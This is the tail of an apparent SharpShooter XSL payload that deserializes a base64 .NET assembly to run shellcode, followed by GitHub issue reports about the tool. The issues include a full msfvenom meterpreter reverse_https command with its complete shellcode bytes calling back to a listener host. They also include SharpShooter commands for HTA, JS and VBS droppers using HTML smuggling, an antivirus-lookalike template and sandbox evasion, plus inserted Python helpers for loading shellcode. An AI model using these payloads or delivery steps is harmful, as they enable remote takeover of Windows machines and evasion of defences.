"Q0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAdAByAGEA"+
"eQAuAGUAeABlAABJQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAVgBC"+
"AG8AeABDAG8AbgB0AHIAbwBsAC4AZQB4AGUAAA0wADAAMABDADIAOQAADTAAMAAxAEMAMQA0AAAN"+
"MAAwADUAMAA1ADYAAA0wADAAMAA1ADYAOQAADTAAOAAwADAAMgA3AAAJLgB7ADIAfQAAByQAMAA6"+
"AAAAAADjPT+Kbg2uQYSXn8N3asUDAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFIAEBEVEEAAAS"+
"ZQMgAA4HAAMCDg4RbQsHBBUSQQEOHQ4IDgUVEkEBDgQAAQIOBSABARMAAyAACBMHCBUSQQEOHQ4d"+
"EkUIEkUdDggOBQAAHRJFBCAAEnUEIAECDgYAAw4ODg4FIAEOHQMDAAACBAcBEggEAAEBCAUHAh0F"+
"GAUAAR0FDgIGGAQAARkLCAAEAR0FCBgICAABEoCZEYCdCQACEoChGBKAmQi3elxWGTTgiQQAEAAA"+
"BAAgAAAEAAAIAAQAAAAgBAAAQAAEAAAQAAQAACAABBAAAAAEIAAAAARAAAAABIAAAAAEAQAAAAQC"+
"AAAABAQAAAAECAAAAAQAAQAABAACAAAEAAQAAAQAQAAABACAAAACBgkDBhEQAwYRFAMGERgDIAAC"+
"CQAEGBgZERARFAkABhgYCRgYCRgHAAMCGAkRGAUgAgEIDgUgAgEcGAcgAhJdEmEcBSABCBJdCAEA"+
"CAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABkBABRTaGFycFNo"+
"b290ZXJBc3NlbWJseQAAIgEAHVNoYXJwU2hvb3RlciBQYXlsb2FkIERlbGl2ZXJ5AAAFAQAAAAAX"+
"AQASTURTZWMgQWN0aXZlQnJlYWNoAAAnAQAiQ29weXJpZ2h0IMKpIE1EU2VjIENvbnN1bHRpbmcg"+
"MjAxNwAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFmMzM3YWJlNTc3NwAADAEABzEuMC4w"+
"LjAAAAUBAAEAAAAAAAALZIRaAAAAAAIAAAAcAQAAHD4AABwgAABSU0RTCkrXhhukXku87fvh281l"+
"6QEAAABaOlxkbWNcQ29kZVxTaGFycFNob290ZXJcU2hhcnBTaG9vdGVyXENTaGFycFNob290ZXJT"+
"dGFnZWxlc3Ncb2JqXFJlbGVhc2VcU2hhcnBTaG9vdGVyQXNzZW1ibHkucGRiAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGA/AAAAAAAAAAAAAHo/AAAAIAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAABsPwAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxs"+
"AAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACA"+
"AAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAPgDAAAAAAAAAAAAAPgDNAAAAFYAUwBfAFYARQBS"+
"AFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQA"+
"AAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABU"+
"AHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsARYAwAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkA"+
"bgBmAG8AAAA0AwAAAQAwADAAMAAwADAANABiADAAAABUAB4AAQBDAG8AbQBtAGUAbgB0AHMAAABT"+
"AGgAYQByAHAAUwBoAG8AbwB0AGUAcgAgAFAAYQB5AGwAbwBhAGQAIABEAGUAbABpAHYAZQByAHkA"+
"AABGABMAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAE0ARABTAGUAYwAgAEEAYwB0AGkAdgBl"+
"AEIAcgBlAGEAYwBoAAAAAABSABUAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAA"+
"UwBoAGEAcgBwAFMAaABvAG8AdABlAHIAQQBzAHMAZQBtAGIAbAB5AAAAAAAwAAgAAQBGAGkAbABl"+
"AFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABSABkAAQBJAG4AdABlAHIAbgBhAGwA"+
"TgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAuAGQAbABs"+
"AAAAAABoACIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA"+
"dAAgAKkAIABNAEQAUwBlAGMAIABDAG8AbgBzAHUAbAB0AGkAbgBnACAAMgAwADEANwAAACoAAQAB"+
"AEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAWgAZAAEATwByAGkAZwBpAG4A"+
"YQBsAEYAaQBsAGUAbgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBi"+
"AGwAeQAuAGQAbABsAAAAAABKABUAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFMAaABhAHIA"+
"cABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABW"+
"AGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYA"+
"ZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAADAAAAwAAACMPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3Nl"+
"bWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'SharpShooter';
try {
setversion();
var shell = new ActiveXObject('WScript.Shell');
shell.popup("test");
var stm = base64ToStream(serialized_obj);
shell.popup("test");
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
shell.popup("test");
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
var sc = "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";
o.Go(sc);
} catch (e) {
debug(e.message);
}
]]>
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="sharp:shooter(.)"/>
</xsl:template>
</xsl:stylesheet>
Payload generation for .net 4 results in a prompt on a default Windows 10 installation to install .net 3.5.
This is via command line and interactive methods.
I believe the confusion is in the code where 1 = .NET 2 and 2 = .NET 4, and a decision is made where 2 (meaning .NET 4) takes .NET 2 instead.
The result is that .NET 2 payloads are always generated.
Easily missed if testing from a Windows 10 system that has had older .net installed.
Hello,
Not sure if my msfvenom statement is correct? I never received any errors. Also, I'm not seeing any errors after running the "python SharpShooter.py..........." command. So, when my Win10 client downloads the HTA payload and opens it, there's no callback to Meterpreter. Am I missing something here?
Thanks, Chrisandjer949
root@kali:/SharpShooter/output# msfvenom --platform windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.8.10 LPORT=4444 EnableStageEncoding=True StageEncoder=x64/shikata_ga_nai -f csharp/SharpShooter/output# cd ..
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 694 bytes
Final size of csharp file: 3548 bytes
byte[] buf = new byte[694] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,
0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,
0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,
0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x0d,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x38,0x2e,
0x31,0x30,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0x5c,0x11,0x00,0x00,0x4d,
0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x00,0x00,
0x00,0x00,0xff,0xd5,0xe8,0x8e,0x00,0x00,0x00,0x2f,0x46,0x4f,0x58,0x6d,0x70,
0x50,0x32,0x74,0x66,0x53,0x70,0x71,0x48,0x32,0x73,0x64,0x4d,0x66,0x66,0x50,
0x35,0x67,0x43,0x42,0x76,0x48,0x4e,0x73,0x72,0x79,0x4f,0x43,0x37,0x59,0x34,
0x52,0x37,0x67,0x62,0x42,0x46,0x4b,0x36,0x79,0x61,0x34,0x4f,0x72,0x46,0x43,
0x65,0x42,0x62,0x6b,0x6a,0x68,0x74,0x73,0x79,0x34,0x63,0x76,0x39,0x4e,0x58,
0x70,0x64,0x38,0x4b,0x69,0x49,0x43,0x4e,0x36,0x48,0x42,0x76,0x32,0x38,0x66,
0x4f,0x49,0x42,0x74,0x75,0x42,0x48,0x35,0x48,0x53,0x57,0x46,0x30,0x4c,0x48,
0x52,0x4b,0x5a,0x75,0x75,0x4e,0x33,0x71,0x6d,0x39,0x75,0x38,0x73,0x4d,0x36,
0x50,0x56,0x52,0x61,0x52,0x5a,0x33,0x34,0x79,0x68,0x35,0x42,0x78,0x50,0x4d,
0x71,0x59,0x77,0x57,0x46,0x37,0x4e,0x75,0x49,0x70,0x37,0x2d,0x72,0x56,0x52,
0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,
0x32,0xa0,0x84,0x00,0x00,0x00,0x00,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,
0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,
0x5a,0x52,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,
0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,
0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,
0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,
0x00,0x00,0x49,0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,
0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,
0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,
0xba,0x58,0xa4,0x53,0xe5,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,
0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,
0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,
0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,
0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,
0xa2,0x56,0xff,0xd5 };
root@kali:
root@kali:~/SharpShooter# python SharpShooter.py --dotnetver 2 --payload hta --output hta --rawscfile ./raw.txt --web http://192.168.8.10/htadoc.hta --smuggle --template mcafee --deliver web --refs mscorlib.dll,System.Windows.Forms.dll --namespace CL2018.SharpShooter --entrypoint Main
_____ __ _____ __ __
/ ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____
\__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ /
/____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/
/_/
Dominic Chell, @domchell, MDSec ActiveBreach, v1.0
[*] Written delivery payload to output/hta.hta
[*] File [./output/hta.hta] successfully loaded !
[*] Encrypted input file with key [qzfcakkbfa]
[*] File [./output/hta.html] successfully created !
root@kali:~/SharpShooter#
Appears to have some compatibility issues with Python 3 and 3.6. Running through the HTA payload generation causes a Python error with the Strings module.
Additionally, when running a fresh pull with Python 2.7 it will not accept a URI for the HTA payload.
I've forked the repo and have started trying to fix the bugs myself, but wanted to make MDSec aware of the issues.
Thanks for an amazing tool!
Hi, I tested out this framework recently but it didn't work that well for me.
In my scenario, I made use of the web delivery portion to deliver my JavaScript payload. When the JavaScript file was executed, it connected back to my attacking web server to get the shellcode (an HTTP Meterpreter payload). However, that was where the problem arose. From the Windows Defender log, I could see the DLL (Meterpreter stager) being dropped into the AppData\Local\Temp folder, causing Windows Defender to flag it as malicious. I'm not sure what's causing this, as based on what I read in the README, the stager should actually be loaded into memory?
Using Python 3 causes a UTF-8 encoding error when generating the payload, while Python 2 works fine.
Example:
root@kali:~/tools/SharpShooter# python3 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc
_____ __ _____ __ __
/ ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____
\__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ /
/____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/
/_/
Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
'utf-8' codec can't decode byte 0xda in position 0: invalid continuation byte
[!] Incorrect choice
root@kali:~/tools/SharpShooter#
root@kali:~/tools/SharpShooter# python2 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc
_____ __ _____ __ __
/ ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____
\__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ /
/____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/
/_/
Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
[*] Written delivery payload to output/poc.hta
root@kali:~/tools/SharpShooter#
Did I miss something?
Create a Cobalt Strike (x32) payload as shown in the Vimeo video
python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output vbstest --rawscfile /root/payload32.bin --sandbox 3,4,5
_____ __ _____ __ __
/ ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____
\__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ /
/____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/
/_/
Dominic Chell, @domchell, MDSec ActiveBreach, v0.2
[*] Avoiding sandbox artifacts
[*] Avoiding bad MACs
[*] Avoiding debugging
[*] Written delivery payload to output/vbstest.vbs
Executing the VBS script on Windows 7 (x64): nothing.
Executing the VBS script on Windows 10 (x64): "An app on your PC needs the following Windows feature"
Anyone facing this issue?
Command (e.g)
python2.7 SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile shell.txt --output test
Traceback (most recent call last):
File "SharpShooter.py", line 599, in <module>
ss.run(args)
File "SharpShooter.py", line 527, in run
payload_minified = jsmin(payload)
File "/usr/local/lib/python2.7/dist-packages/jsmin/__init__.py", line 40, in jsmin
ins = klass(js)
TypeError: initial_value must be unicode or None, not str
Problem: modules/excel4.py mixes spaces and tabs.
Version: latest master
Python version 3.9.0
OS: ParrotOS
Running python3 SharpShooter.py
results in:
Traceback (most recent call last):
File "/mnt/hgfs/debian/SharpShooter/SharpShooter.py", line 21, in <module>
from modules import *
File "/mnt/hgfs/debian/SharpShooter/modules/excel4.py", line 39
if i == 0:
TabError: inconsistent use of tabs and spaces in indentation
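Two of the environment failures reported on this page, jsmin reported missing even though it is installed (the issues higher up) and the TabError from modules/excel4.py just above, can be reproduced without running SharpShooter at all. The script below is an added example, not part of the project. module_available asks the interpreter that is actually running whether it can find a module (a jsmin installed by a pip that belongs to a different interpreter shows as missing here too, which is the usual explanation for "it exists on the system but is not found"), install_hint gives the pip invocation bound to that same interpreter, and indentation_error uses compile() to reproduce the tab/space consistency check that raises TabError at import time. The module names checked and the indented snippet are constructed for illustration.

```python
import importlib.util
import sys
from typing import Optional


def module_available(name: str) -> bool:
    """True when `name` can be imported by *this* interpreter.

    find_spec consults the same search path an `import` statement would use,
    so a module installed into another interpreter's site-packages (e.g. by
    `pip3` while the tool is run with `python` = Python 2) is reported missing.
    """
    return importlib.util.find_spec(name) is not None


def install_hint(name: str) -> str:
    """The pip invocation tied to the running interpreter, avoiding the pip/python mismatch."""
    return f"{sys.executable} -m pip install {name}"


def indentation_error(source: str, filename: str = "<string>") -> Optional[str]:
    """Return the TabError message for `source`, or None when indentation is consistent.

    compile() performs the same check the interpreter applies when importing
    a module, so this reproduces the failure without executing the file.
    Other syntax errors are deliberately ignored here.
    """
    try:
        compile(source, filename, "exec")
    except TabError as exc:
        return f"{filename}:{exc.lineno}: {exc.msg}"
    except SyntaxError:
        return None
    return None


# Constructed snippet: a block indented with 8 spaces followed by a line in
# the same block indented with a tab, the shape of the excel4.py failure above.
MIXED_INDENT = "for i in range(2):\n        value = i\n\tif i == 0:\n\t\tpass\n"
CLEAN_INDENT = "for i in range(2):\n    value = i\n    if i == 0:\n        pass\n"


if __name__ == "__main__":
    # Assumed module names for the demonstration.
    for mod in ("jsmin", "argparse"):
        state = "ok" if module_available(mod) else "missing -> " + install_hint(mod)
        print(f"{mod}: {state}")
    print("mixed indentation:", indentation_error(MIXED_INDENT, "excel4.py"))
    print("clean indentation:", indentation_error(CLEAN_INDENT, "excel4.py"))
```

Running the indentation check over a real file is `indentation_error(open(path).read(), path)`; the standard library's `python -m tabnanny <file>` does the same job from the command line.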
I'm trying to generate a shellcode for a stageless sharpshooter payload, and I can't seem to format the shellcode in a way that it likes.
If I use msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=<host> LPORT=80 Prependmigrate=true -f raw -o meter.out
then I get an error during the interactive payload creation like
[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter.out
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte
Okay, so I used -f python, -f hex and the like, and it complains thus:
[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter_hex.out
a bytes-like object is required, not 'str'
So I can't seem to satisfy its requirement. What weird thing am I doing wrong here? Or is this a python2/3 deal?
python -V
Python 3.6.4
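Both failures in this issue, and the 'utf-8' codec error in the Python 3 issue earlier on this page, come from the same Python 3 distinction between bytes and str: opening a -f raw file in text mode decodes it as UTF-8, which fails on 0xfc (an invalid start byte), while handing -f hex or -f python text to code that expects bytes produces the "a bytes-like object is required, not 'str'" TypeError. The helper below is an added example, not SharpShooter's own input handling: it reads the file in binary mode and normalises either raw bytes or the textual msfvenom forms into bytes. The sample bytes are the first five from the msfvenom output quoted earlier in this thread; the printable-ASCII heuristic assumes that raw shellcode is not itself plain ASCII text.

```python
import re
from typing import Union


def read_shellcode_file(path: str) -> bytes:
    """Read a shellcode file without decoding it.

    open(path) / open(path, "r") in Python 3 decodes the file as text (UTF-8
    by default) and raises UnicodeDecodeError on 0xfc, the first byte of the
    usual x64 stager. Binary mode hands back the bytes untouched.
    """
    with open(path, "rb") as fh:
        return fh.read()


def text_mode_would_fail(data: bytes) -> bool:
    """True when these bytes are not valid UTF-8, i.e. a text-mode read of the
    same file would raise 'invalid start byte' / 'invalid continuation byte'."""
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return False


# '\xfc' (-f python / -f c) and '0xfc' (-f csharp) style byte literals.
_PREFIXED_HEX = re.compile(r"(?:\\x|0x)([0-9a-fA-F]{2})")


def parse_hex_text(text: str) -> bytes:
    """Turn msfvenom's textual formats into bytes.

    Handles -f python / -f c style '\\xfc\\x48', -f csharp style '0xfc,0x48'
    and -f hex style 'fc4883'. Anything else raises ValueError rather than
    silently producing wrong bytes.
    """
    prefixed = _PREFIXED_HEX.findall(text)
    if prefixed:
        return bytes.fromhex("".join(prefixed))
    digits = text.strip()
    if not re.fullmatch(r"(?:[0-9a-fA-F]{2})+", digits):
        raise ValueError("not raw bytes and not a recognised hex text format")
    return bytes.fromhex(digits)


def load_shellcode(data: Union[bytes, str]) -> bytes:
    """Return shellcode as bytes whether the caller passes str (a textual
    format read in text mode) or bytes (a file read in binary mode)."""
    if isinstance(data, str):
        return parse_hex_text(data)
    # Bytes that are entirely printable ASCII are almost certainly a textual
    # format saved to disk and read in binary mode, so parse them as text.
    # Assumption: genuine raw shellcode contains non-printable bytes.
    if data and all(0x20 <= b < 0x7F or b in b"\r\n\t" for b in data):
        return parse_hex_text(data.decode("ascii"))
    return data


# Sample input: the first five bytes of the msfvenom output quoted earlier in
# this thread, as raw bytes and in the three textual forms the reporter tried.
RAW = b"\xfc\x48\x83\xe4\xf0"
HEX_TEXT = "fc4883e4f0\n"
CSHARP_TEXT = "byte[] buf = new byte[5] {\n0xfc,0x48,0x83,0xe4,0xf0 };\n"
PYTHON_TEXT = 'buf =  b""\nbuf += b"\\xfc\\x48\\x83\\xe4\\xf0"\n'


if __name__ == "__main__":
    print("text-mode read would fail on the raw file:", text_mode_would_fail(RAW))
    for name, sample in (("raw", RAW), ("hex", HEX_TEXT), ("csharp", CSHARP_TEXT), ("python", PYTHON_TEXT)):
        print(f"{name:7}-> {load_shellcode(sample).hex()}")
```

The two error messages in the issue map directly onto the two branches: the first appears when a raw file goes through a text-mode `open()`, the second when text from -f hex or -f python reaches an API that wanted bytes; reading in binary mode and normalising once at the boundary avoids both.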
Hello,
How do I set LHOST and LPORT? I didn't find the options.
Hello,
I didn't find any mention of the license. Could you indicate under which license SharpShooter is published, in the README or in a specific LICENSE file?
Thanks
Hi,
Currently I'm generating a RAW payload in Cobalt Strike for a windows/beacon/reverse_https listener. Output is a standard payload.bin file, which is then used as input to SharpShooter as follows:
SharpShooter.py --stageless --dotnetver 4 --payload hta --output test --rawscfile payload.bin
I've also tried the following variation:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile payload.bin --smuggle --template mcafee
However, every time I try to run the HTA file on Windows, the payload fails to call back. Windows Defender is disabled for all of this testing, and no other AV is present. Network monitoring with Wireshark confirms too that the payload is not calling out. I have tried modifying the harness.hta template to just take the payload.bin as input, without any base64 encoding or the RC4 encipherment, to check if it works; however, the payload still refuses to call out or even make a network connection attempt.
Am I being obtuse, or can someone confirm these findings? I have tried with both Internet Explorer and, of course, Microsoft (R) HTML Application Host.
Would be cool if we could use Python 3 instead of 2 for this. It doesn't even run for me with Python 2 now.